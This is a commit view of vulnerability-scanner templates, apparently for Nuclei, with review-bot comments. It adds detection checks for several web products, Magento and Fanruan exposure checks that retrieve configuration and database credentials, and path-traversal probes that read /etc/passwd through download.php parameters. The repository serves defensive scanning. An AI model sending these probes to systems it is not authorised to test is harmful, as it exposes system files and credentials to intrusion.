- "{{BaseURL}}"
- "{{BaseURL}}/modules/system/assets/js/framework.combined-min.js"
redirects: true
max-redirects: 1
matchers:
- type: word
part: header
words:
- 'october_session'
- type: word
part: body
words:
- 'OctoberCMS'
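Review bot: Same `references:` vs `reference:` key issue as elsewhere in this change. With no `matchers-condition` the two matchers are OR'd, so any page whose body merely mentions "OctoberCMS" (a blog post, a changelog) is reported; use `matchers-condition: and` or restrict the body match to the `framework.combined-min.js` response.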

View File

@ -0,0 +1,26 @@
id: pega-detect
info:
name: Pega Infinity Detection
author: sshell
severity: info
tags: tech,pega
requests:
- method: GET
path:
- "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs"
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
matchers-condition: and
matchers:
- type: word
words:
- '"description" :"The Pega API'
- type: status
status:
- 200
- type: word
words:
- 'application/json'
part: header

View File

@ -0,0 +1,24 @@
id: voipmonitor-detect
info:
name: VoipMonitor detect
author: Yanyun
severity: info
tags: tech,voipmonitor
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'share.voipmonitor.org'
- 'VoIPmonitor'
condition: and

View File

@ -0,0 +1,23 @@
id: xxljob-admin-detect
info:
name: XXLJOB Admin Login
author: pdteam
severity: info
tags: tech,xxljob
requests:
- method: GET
path:
- "{{BaseURL}}/xxl-job-admin/toLogin"
matchers-condition: and
matchers:
- type: word
words:
- "<a><b>XXL</b>JOB</a>"
- type: status
status:
- 200

View File

@ -0,0 +1,42 @@
id: magento-2-exposed-api
info:
name: Exposed Magento 2 API
author: TechbrunchFR
severity: info
description: The API in Magento 2 can be accessed by the world without providing credentials. Through the API information like storefront, (hidden) products including prices are exposed.
reference: https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api
tags: magento
requests:
- method: GET
path:
- '{{BaseURL}}/rest/V1/products'
- '{{BaseURL}}/rest/V1/store/storeConfigs'
- '{{BaseURL}}/rest/V1/store/storeViews'
matchers-condition: or
matchers:
- type: dsl
dsl:
- 'contains(body, "searchCriteria")'
- 'contains(body, "parameters")'
- 'contains(body, "message")'
- 'contains(tolower(all_headers), "application/json")'
condition: and
- type: dsl
dsl:
- 'contains(body, "secure_base_link_url")'
- 'contains(body, "timezone")'
- 'contains(tolower(all_headers), "application/json")'
- 'status_code == 200'
condition: and
- type: dsl
dsl:
- 'contains(body, "name")'
- 'contains(body, "website_id")'
- 'contains(tolower(all_headers), "application/json")'
- 'status_code == 200'
condition: and
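Review bot: The first `dsl` matcher (the `/rest/V1/products` case) requires `searchCriteria`, `parameters` and `message` but, unlike the other two, no `status_code == 200`; those three strings together look like the API's error body for a missing searchCriteria parameter rather than a product listing, so that branch confirms the endpoint exists rather than that products are readable. Either add the status check or describe the finding as endpoint exposure.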

View File

@ -0,0 +1,35 @@
id: magento-cacheleak
info:
name: Magento Cacheleak
author: TechbrunchFR
severity: high
description: Magento Cacheleak is an implementation vulnerability, result of bad implementation of web-server configuration for Magento platform. Magento was developed to work under the Apache web-server which natively works with .htaccess files, so all needed configuration directives specific for various internal Magento folders were placed in .htaccess files. When Magento is installed on web servers that are ignoring .htaccess files (such as nginx), an attacker can get access to internal Magento folders (such as the Magento cache directory) and extract sensitive information from cache files.
reference:
- https://support.hypernode.com/en/best-practices/security/how-to-secure-magento-cacheleak
- https://www.acunetix.com/vulnerabilities/web/magento-cacheleak/
- https://royduineveld.nl/magento-cacheleak-exploit/
tags: magento
requests:
- method: GET
path:
- '{{BaseURL}}/var/resource_config.json'
# Based on royduineveld.nl blogpost, was not tested against a vulnerable Magento site
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "media_directory"
- "allowed_resources"
part: body
- type: word
words:
- "application/json"
part: header
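Review bot: The inline comment says the request was built from the blog post and "was not tested against a vulnerable Magento site", yet severity is set to high; ask for a test result or a captured response showing the `media_directory`/`allowed_resources` words before merging at that severity, and mention in the description that the checked file is `var/resource_config.json` rather than the cache directory the text describes.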

View File

@ -0,0 +1,35 @@
id: magento-unprotected-dev-files
info:
name: Magento Unprotected development files
author: TechbrunchFR
severity: high
description: Magento version 1.9.2.x includes /dev directories or files that might reveal your passwords and other sensitive information. The /dev directories and files are not protected by default. According to Magento, "these tests are not supposed to end up on production servers".
reference: https://support.hypernode.com/en/support/solutions/articles/48001153348-how-to-secure-your-data-using-encryption-and-hashing
tags: magento
requests:
- method: GET
path:
- '{{BaseURL}}/dev/tests/functional/credentials.xml.dist'
- '{{BaseURL}}/dev/tests/functional/etc/config.xml.dist'
matchers:
- type: dsl
dsl:
- 'contains(body, "Magento")'
- 'contains(body, "replace xmlns:xsi=")'
- 'contains(body, "<field path=")'
- 'contains(tolower(all_headers), "application/xml") || contains(tolower(all_headers), "application/octet-stream")'
- 'status_code == 200'
condition: and
- type: dsl
dsl:
- 'contains(body, "Magento")'
- 'contains(body, "config xmlns:xsi")'
- 'contains(body, "<application>")'
- 'contains(body, "<install>")'
- 'contains(tolower(all_headers), "application/xml") || contains(tolower(all_headers), "application/octet-stream")'
- 'status_code == 200'
condition: and
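Review bot: the only `reference:` points, per its URL slug, to a hypernode guide on encryption and hashing, which does not obviously document the unprotected `/dev/tests/functional` files this template checks; add a reference that describes that exposure (the quoted Magento statement about the tests not belonging on production servers needs a source too). The `description` should also end with a period and, since it names only 1.9.2.x while the paths are not version-gated, say whether other versions are expected to expose the same files.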

View File

@ -2,9 +2,9 @@ id: oracle-ebs-bispgrapgh-file-read
info:
name: Oracle EBS Bispgraph File Access
author: emenalf & tirtha_mandal
author: emenalf & tirtha_mandal & thomas_from_offensity
severity: critical
tags: moodle,lfi
tags: oracle,lfi
reference: |
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
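Review bot: `reference: |` turns the two `- https://...` entries into a single literal block string (dashes included) rather than a YAML sequence, so consumers reading `reference` as a list will see one opaque string; drop the `|` so the field is a proper list, as in the other templates in this commit. The tag correction from `moodle` to `oracle` and the added author are fine.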
@ -20,4 +20,4 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
part: body

View File

@ -27,6 +27,8 @@ requests:
part: header
words:
- "text/html"
- "CONCRETE5"
condition: and
- type: status
status:

View File

@ -0,0 +1,36 @@
id: fanruanoa2012-disclosure
info:
name: Fanruan Report 2012 Information Disclosure
author: YanYun
discrption: Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL
severity: high
tags: oa,java,fanruan,disclosure
reference: http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%202012%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
requests:
- method: GET
path:
- "{{BaseURL}}/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
- "{{BaseURL}}/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '"connection"'
- '"name"'
- '"driver"'
- '"password"'
- '"url"'
- '"user"'
condition: and
- type: word
words:
- "application/json"
part: header
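Review bot: `discrption:` under `info` is a typo for `description:`, so the text is not recognised as the template description; rename the key. While there, end the description with a period to match the other templates in this change.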

View File

@ -0,0 +1,25 @@
id: flir-path-traversal
info:
name: Flir Path Traversal
author: pikpikcu
severity: high
reference: https://juejin.cn/post/6961370156484263972
tags: flir,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/download.php?file=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
condition: and
- type: status
status:
- 200
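Review bot: `condition: and` under the regex matcher is a no-op with a single regex entry and can be dropped. The template also lacks a `description:`, unlike the other new templates in this commit; add one so the `download.php?file=` check is documented.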

View File

@ -0,0 +1,24 @@
id: natshell-path-traversal
info:
name: NatShell Path Traversal
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
tags: natshell,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/download.php?file=../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "toor:[x*]:0:0"
- type: status
status:
- 200
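Review bot: the regex `toor:[x*]:0:0` looks like a transposition of `root:`; a standard /etc/passwd starts with `root:x:0:0:`, so unless NatShell devices are known to ship a `toor` account (as some BSD systems do) this matcher will never fire. Change it to `root:[x*]:0:0` as used by the other LFI templates in this commit, and add a `description:`.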

View File

@ -7,4 +7,4 @@ info:
tags: workflow
workflows:
- template: misconfiguration/aem/
- template: misconfiguration/aem/

View File

@ -10,7 +10,4 @@ workflows:
- template: exposed-panels/gitlab-detect.yaml
subtemplates:
- template: misconfiguration/gitlab/gitlab-public-repos.yaml
- template: misconfiguration/gitlab/gitlab-public-signup.yaml
- template: misconfiguration/gitlab/gitlab-public-snippets.yaml
- template: misconfiguration/gitlab/gitlab-user-enumeration.yaml
- template: misconfiguration/gitlab/
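Review bot: replacing the four explicit subtemplate paths with the `misconfiguration/gitlab/` directory changes the workflow's semantics: every template placed in that directory, including ones added later, now runs whenever `gitlab-detect.yaml` matches, and the workflow file no longer shows what it executes. That is fine if intended, but deserves a sentence in the workflow description; the same applies to the jira, samsung, springboot, thinkcmf, thinkphp and wordpress workflows converted to directory references in this commit.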

View File

@ -23,11 +23,4 @@ workflows:
- template: cves/2019/CVE-2019-3403.yaml
- template: cves/2020/CVE-2020-14179.yaml
- template: cves/2020/CVE-2020-14181.yaml
- template: vulnerabilities/jira/jira-service-desk-signup.yaml
- template: vulnerabilities/jira/jira-unauthenticated-dashboards.yaml
- template: vulnerabilities/jira/jira-unauthenticated-popular-filters.yaml
- template: vulnerabilities/jira/jira-unauthenticated-projects.yaml
- template: vulnerabilities/jira/jira-unauthenticated-user-picker.yaml
- template: vulnerabilities/jira/jira-unauthenticated-resolutions.yaml
- template: vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml
- template: vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml
- template: vulnerabilities/jira/

View File

@ -0,0 +1,14 @@
id: magento-workflow
info:
name: Magento Security Checks
author: TechbrunchFR
description: A simple workflow that runs all Magento related nuclei templates on a given target.
tags: workflow
workflows:
- template: technologies/magento-detect.yaml
subtemplates:
- template: exposures/configs/magento-config.yaml
- template: exposed-panels/magento-admin-panel.yaml
- template: vulnerabilities/magento/
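Review bot: the workflow relies on `vulnerabilities/magento/` containing the two new Magento templates (`magento-cacheleak` and `magento-unprotected-dev-files`), but this commit view does not show the paths under which those files were added; confirm they land in that directory, otherwise the workflow gate on `magento-detect.yaml` will only run the config and admin-panel templates.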

View File

@ -7,6 +7,4 @@ info:
workflows:
- template: default-logins/samsung/samsung-wlan-ap-default-credentials.yaml
- template: vulnerabilities/samsung/samsung-wlan-ap-rce.yaml
- template: vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml
- template: vulnerabilities/samsung/samsung-wlan-ap-xss.yaml
- template: vulnerabilities/samsung/

View File

@ -13,14 +13,7 @@ workflows:
- template: technologies/springboot-actuator.yaml
subtemplates:
- template: misconfiguration/springboot/springboot-configprops.yaml
- template: misconfiguration/springboot/springboot-env.yaml
- template: misconfiguration/springboot/springboot-heapdump.yaml
- template: misconfiguration/springboot/springboot-httptrace.yaml
- template: misconfiguration/springboot/springboot-loggers.yaml
- template: misconfiguration/springboot/springboot-mappings.yaml
- template: misconfiguration/springboot/springboot-trace.yaml
- template: vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
- template: vulnerabilities/springboot/springboot-h2-db-rce.yaml
- template: misconfiguration/springboot/
- template: vulnerabilities/springboot/
- template: cves/2018/CVE-2018-1271.yaml
- template: cves/2020/CVE-2020-5410.yaml
- template: cves/2020/CVE-2020-5410.yaml

View File

@ -9,5 +9,4 @@ workflows:
- template: technologies/thinkcmf-detection.yaml
subtemplates:
- template: vulnerabilities/thinkcmf/thinkcmf-lfi.yaml
- template: vulnerabilities/thinkcmf/thinkcmf-rce.yaml
- template: vulnerabilities/thinkcmf/

View File

@ -11,7 +11,4 @@ workflows:
matchers:
- name: thinkphp
subtemplates:
- template: vulnerabilities/thinkphp/thinkphp-2-rce.yaml
- template: vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
- template: vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
- template: vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml
- template: vulnerabilities/thinkphp/

View File

@ -31,29 +31,5 @@ workflows:
- template: cves/2020/CVE-2020-35951.yaml
- template: cves/2020/CVE-2020-35489.yaml
- template: cves/2021/CVE-2021-24146.yaml
- template: vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml
- template: vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
- template: vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml
- template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
- template: vulnerabilities/wordpress/sassy-social-share.yaml
- template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
- template: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
- template: vulnerabilities/wordpress/wordpress-db-backup.yaml
- template: vulnerabilities/wordpress/wordpress-debug-log.yaml
- template: vulnerabilities/wordpress/wordpress-directory-listing.yaml
- template: vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml
- template: vulnerabilities/wordpress/wordpress-emergency-script.yaml
- template: vulnerabilities/wordpress/wordpress-installer-log.yaml
- template: vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml
- template: vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml
- template: vulnerabilities/wordpress/wordpress-user-enumeration.yaml
- template: vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
- template: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml
- template: vulnerabilities/wordpress/wordpress-xmlrpc-listmethods.yaml
- template: vulnerabilities/wordpress/wp-xmlrpc.yaml
- template: vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
- template: vulnerabilities/wordpress/wp-enabled-registration.yaml
- template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml
- template: vulnerabilities/wordpress/wp-uploads-listing.yaml
- template: vulnerabilities/wordpress/wp-license-file.yaml
- template: vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml
- template: cves/2021/CVE-2021-24176.yaml
- template: vulnerabilities/wordpress/